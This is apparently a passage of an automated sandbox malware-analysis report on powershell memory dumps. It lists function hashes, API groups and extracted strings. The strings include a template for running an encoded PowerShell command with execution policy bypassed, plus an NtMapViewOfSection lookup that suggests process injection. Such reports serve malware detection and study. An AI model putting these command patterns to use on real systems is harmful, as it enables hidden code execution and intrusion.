                                                    • Opcode ID: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
                                                    • Instruction ID: 04d96e3dac9689a320e8f9714ac4842490b8cf50cb9f2f1e4702e4843cb029ec
                                                    • Opcode Fuzzy Hash: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
                                                    • Instruction Fuzzy Hash: 3D416272210680E2FF108FA5F64871A77A1F78C794F264225EA995BFB4DB3CD491EB00
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentProcess$ErrorLast$AttributeProcThreadUpdate
                                                    • String ID:
                                                    • API String ID: 1014270282-0
                                                    • Opcode ID: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
                                                    • Instruction ID: 4f0ddad8d448d0b8360db552f46772af0e4f9d785f52735e7d11b11e93a0d8f5
                                                    • Opcode Fuzzy Hash: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
                                                    • Instruction Fuzzy Hash: 27416F3261478097EF20DF92E54839977A1F78CFD8F094529AA494BFA5DB7CC605AB00
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                                                    • String ID:
                                                    • API String ID: 1547050394-0
                                                    • Opcode ID: 0ee48a0889aaee90efd1175476a0cb7edf48224d72ecded3f82ab5c2f8e8549f
                                                    • Instruction ID: d0a4925a0e120e114a9808fc31d7ef8836a28285a831ed3026d1422349fbed13
                                                    • Opcode Fuzzy Hash: 0ee48a0889aaee90efd1175476a0cb7edf48224d72ecded3f82ab5c2f8e8549f
                                                    • Instruction Fuzzy Hash: A8212761308786B1FF329BA39A2D75EA295F765BC0F464421DEC887F86DB7CC400A708
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                                                    • String ID:
                                                    • API String ID: 1547050394-0
                                                    • Opcode ID: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
                                                    • Instruction ID: f2e4704a8edb9798360390409e48aa3e50d3e0926f408b76b990848836170ce6
                                                    • Opcode Fuzzy Hash: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
                                                    • Instruction Fuzzy Hash: DC21D863714782A1FF515FA1BA0935E62A4AB4C7C0F464821AD4E8FFAADF7CC4406704
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit
                                                    • String ID:
                                                    • API String ID: 2102446242-0
                                                    • Opcode ID: acc1e709539f3a0e8ebe9ec8259c6fe6fa9b3b7ac075e700e957115c0bfbe106
                                                    • Instruction ID: c93f522df687a020e6854ab51086951096af18fa49508aec0d6be43b35aefdfd
                                                    • Opcode Fuzzy Hash: acc1e709539f3a0e8ebe9ec8259c6fe6fa9b3b7ac075e700e957115c0bfbe106
                                                    • Instruction Fuzzy Hash: 3021F321700642E1FF31EFE99ABDBAC765497A0760F0B4128DBD607BD2DA78C841A31C
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$ErrorHeapLastfree$AllocFree_callnewhfclosefwritemalloc
                                                    • String ID:
                                                    • API String ID: 1616846154-0
                                                    • Opcode ID: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
                                                    • Instruction ID: 10b6259351297df9ae3b84852ad3e0d35b12034e8932375be81bbdd2bffc999e
                                                    • Opcode Fuzzy Hash: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
                                                    • Instruction Fuzzy Hash: 6511B41170474061ED20EBA2B3583AE5351AB8DBD4F454221BE5E4FFEBEE2CC5059790
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: NamedPipe$ErrorLast$CreateDisconnectFileHandleStateWait
                                                    • String ID:
                                                    • API String ID: 3798860377-0
                                                    • Opcode ID: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
                                                    • Instruction ID: f9b3ed231ab935b2768e657f43623ee3785030f092b8ea61ce4438a9aa6ba129
                                                    • Opcode Fuzzy Hash: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
                                                    • Instruction Fuzzy Hash: 4811D032604651A2FF208BA1F69C71E32A1F78CBA8F4242159A5A4BFB4CFBDC445A700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
                                                    • String ID: dpoolWait
                                                    • API String ID: 2026495703-1875951006
                                                    • Opcode ID: 8070209c1cbe6b8a0a820429e4883b75791e823d018c18b7f063917c64386bf6
                                                    • Instruction ID: 27fafdf4fbe3f689a6916732e3535e7a76dbf8c44b82924ac776ace678c2d7aa
                                                    • Opcode Fuzzy Hash: 8070209c1cbe6b8a0a820429e4883b75791e823d018c18b7f063917c64386bf6
                                                    • Instruction Fuzzy Hash: 7401C47170079051EE16DB93B9187596699F7A8FE0F06422DEEA947FC6CF38C0418744
                                                    APIs
                                                    Strings
                                                    • HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 0000022EFA0CF044
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errnomalloc$_callnewh$AllocHeap_invalid_parameter_noinfo_snprintf
                                                    • String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
                                                    • API String ID: 3518644649-2739389480
                                                    • Opcode ID: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
                                                    • Instruction ID: de8ad4161009a9a66578c2b90eee8c1ca75821893296401fae313cb4118ffb79
                                                    • Opcode Fuzzy Hash: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
                                                    • Instruction Fuzzy Hash: 2601C032701B9052EE44DB92B9487596799F78CFE0F164229EEA94BFE6DF3CC4418780
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: freemallocstrchr$rand
                                                    • String ID:
                                                    • API String ID: 1305919620-0
                                                    • Opcode ID: f55c98597b31e9256bdda085e271814e8bdd530284bc77f6856305a025606a71
                                                    • Instruction ID: 97e985e95771c4031f342cfc85e0bffceae314a39101b192ced222eaafa0b155
                                                    • Opcode Fuzzy Hash: f55c98597b31e9256bdda085e271814e8bdd530284bc77f6856305a025606a71
                                                    • Instruction Fuzzy Hash: 2F713951608BC461FE3B9B69A5283EAA390EFA5BC4F094114DFC957FA6EE3CC1429704
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: freemallocstrchr$rand
                                                    • String ID:
                                                    • API String ID: 1305919620-0
                                                    • Opcode ID: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
                                                    • Instruction ID: 02f93262ffad0627e5199d4f47ccbb59b089e5484e2252b3d22d67171e976ef6
                                                    • Opcode Fuzzy Hash: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
                                                    • Instruction Fuzzy Hash: A0712B62614BC061FE269FA9B1093EAA390EF8DBC4F095110DF850BFB6EE2CC1439311
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$_errno$_callnewhmalloc
                                                    • String ID:
                                                    • API String ID: 2761444284-0
                                                    • Opcode ID: 3866d312ddc7406d2c13ac3d10959d9d3de063b9a6b1dce899036bf231b32379
                                                    • Instruction ID: 29ca55ed767d09f3a575d81c00ab8f8361ab65be5445805038fd30de42f8fbab
                                                    • Opcode Fuzzy Hash: 3866d312ddc7406d2c13ac3d10959d9d3de063b9a6b1dce899036bf231b32379
                                                    • Instruction Fuzzy Hash: CD41F321304791A7EE3ADFA796783596790F729BC0F460024DE8647F45EF34D462D708
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$_errno$_callnewhmalloc$AllocHeap
                                                    • String ID:
                                                    • API String ID: 996410232-0
                                                    • Opcode ID: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
                                                    • Instruction ID: b87dae5485c62137a367097813e264857241f63bbd5781ee6c6f407a566d9861
                                                    • Opcode Fuzzy Hash: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
                                                    • Instruction Fuzzy Hash: 0D41E62930078167EE559BE6AB6835A2750B74DBC0F824120DF458FF65EF3CD522E300
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: htonl$freemalloc
                                                    • String ID: zyxwvutsrqponmlk
                                                    • API String ID: 1249573706-3884694604
                                                    • Opcode ID: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
                                                    • Instruction ID: 8233d111adf7a6d6ee80dbb401b54e1ddfc8297fa45477926144948c214994d9
                                                    • Opcode Fuzzy Hash: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
                                                    • Instruction Fuzzy Hash: 2B31E86230078062EF14DAF6B76936966D1978DBC0F064434AE598BFF7EE3CC5069300
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentProcess$AddressErrorHandleLastModuleProc
                                                    • String ID: NtMapViewOfSection$ntdll.dll
                                                    • API String ID: 1006775078-3170647572
                                                    • Opcode ID: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
                                                    • Instruction ID: 139b2b0778726e54c3f959749e9e83c245eea79d6125f25cf8876052a20c418a
                                                    • Opcode Fuzzy Hash: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
                                                    • Instruction Fuzzy Hash: 9E31AF22701744A6EF10DBA1F59D76A63A0F78CBA4F150329AE690BFE6DF7CC4459700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: strtok$_getptd_time64malloc
                                                    • String ID: eThreadpoolTimer
                                                    • API String ID: 1522986614-2707337283
                                                    • Opcode ID: b02d7519bf37bc4b38ca8186062a8fc85f913fef5048514e0fa6af22142f2d69
                                                    • Instruction ID: a7d6e6c880b89699795adb2a0c8c7abc9ec0ce774170150333f7343b13a78cb7
                                                    • Opcode Fuzzy Hash: b02d7519bf37bc4b38ca8186062a8fc85f913fef5048514e0fa6af22142f2d69
                                                    • Instruction Fuzzy Hash: 5D21D8726007A491EF22DF92A2AC65D77A8F765BD4F174225EF9A43B81CF34C441C784
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$remove$_callnewh_invalid_parameter_noinfo_snprintfmalloc
                                                    • String ID: uld not open process: %d (%u)
                                                    • API String ID: 2566950902-823969559
                                                    • Opcode ID: fcd4f31b16295b3d981e03ccf995d44eb940f919008a0e94d9d9162e5faefa64
                                                    • Instruction ID: fae91c09c2b1cb6f4b0b1607aa7e57b1680c968e411d745365c43fa528594e5a
                                                    • Opcode Fuzzy Hash: fcd4f31b16295b3d981e03ccf995d44eb940f919008a0e94d9d9162e5faefa64
                                                    • Instruction Fuzzy Hash: 9AF0962160464099EA36DB92BA2539AA354E7A5BC0F594134EFC917F56CE38C4419B48
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$remove$AllocHeap_callnewh_invalid_parameter_noinfo_snprintfmalloc
                                                    • String ID: %s\%s
                                                    • API String ID: 1896346573-4073750446
                                                    • Opcode ID: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
                                                    • Instruction ID: 50edac745a484ea865a35f6e36c3248cf66036776a7d2299f186725808d7416e
                                                    • Opcode Fuzzy Hash: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
                                                    • Instruction Fuzzy Hash: 97F0B426204B41A6FB10AB91BA043AEA360E78CFC0F594121BF881FFB6DE7CC411A744
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: malloc$_snprintf$_errno_time64freehtonlstrtok$AllocExitHeapLocalSleepThreadTime_callnewhrealloc
                                                    • String ID:
                                                    • API String ID: 548016584-0
                                                    • Opcode ID: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
                                                    • Instruction ID: dff07ba835178956bb172e3bc1147b4a11cc9f7cc5220783e67f1dd0712bdd58
                                                    • Opcode Fuzzy Hash: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
                                                    • Instruction Fuzzy Hash: D4C1A06130028176FE18EBE1B76D7AA2295AB8D7C0F474124A9558FFF7DE3CC805A710
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _snprintf$strchr$_errno_invalid_parameter_noinfo
                                                    • String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
                                                    • API String ID: 199363273-1250630670
                                                    • Opcode ID: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
                                                    • Instruction ID: 9c87b9ad7efa06709228b9888c77b6c38780cc2296845f6d7a71638b5ad9d5a8
                                                    • Opcode Fuzzy Hash: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
                                                    • Instruction Fuzzy Hash: C671E422700684A6EF30DFA1E6687DA73A1F7A4784F424115EEC917F98DF38C549D708
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
                                                    • Instruction ID: db1c48d5aacc14485c7253ed190bd0d92c9ba46e93644f086ec9748ad2216fc7
                                                    • Opcode Fuzzy Hash: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
                                                    • Instruction Fuzzy Hash: 9851AF62B00A40A6EF10EFA5E6453ED2360F759788F469115EE092BFA6EF3CC545D740
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 1640621425-0
                                                    • Opcode ID: f714c1e563aa58d873e3883a1df435710c86d18d380f096712ab5731ea4c4750
                                                    • Instruction ID: a926d28262253404a6a3cfe23d9947dab81c96c59464fad408c10ae7d9d7b6be
                                                    • Opcode Fuzzy Hash: f714c1e563aa58d873e3883a1df435710c86d18d380f096712ab5731ea4c4750
                                                    • Instruction Fuzzy Hash: E6415921300344A6FE3A8EE3577C35EBAA1F765FE1F1A82209ED547FD1D638C441A208
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 1640621425-0
                                                    • Opcode ID: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
                                                    • Instruction ID: 3897b31d5a6c3fd5340f79dc97e21f473ed93536d140f7387fee15b8e1177fd8
                                                    • Opcode Fuzzy Hash: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
                                                    • Instruction Fuzzy Hash: 2641E72370074066FE649EA2778835EA691B78CFD4F5A42249E5B4FFF1DE7CC441A608
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$_errno$_callnewhmalloc
                                                    • String ID:
                                                    • API String ID: 2761444284-0
                                                    • Opcode ID: 326b315c93b4297f8d1cd44fbd3c536e1a3741d65750285d3f659b19031d268f
                                                    • Instruction ID: 28d2455186ae3afc2eee6fc4c190e727d4d8b513e2482b7a1d5a1cad3ecedf30
                                                    • Opcode Fuzzy Hash: 326b315c93b4297f8d1cd44fbd3c536e1a3741d65750285d3f659b19031d268f
                                                    • Instruction Fuzzy Hash: 7741262232038962EE32DFA756687596695F7B5BC8F0B4034DD958BF41EE38C447D308
                                                    APIs
                                                    Memory Dump Source
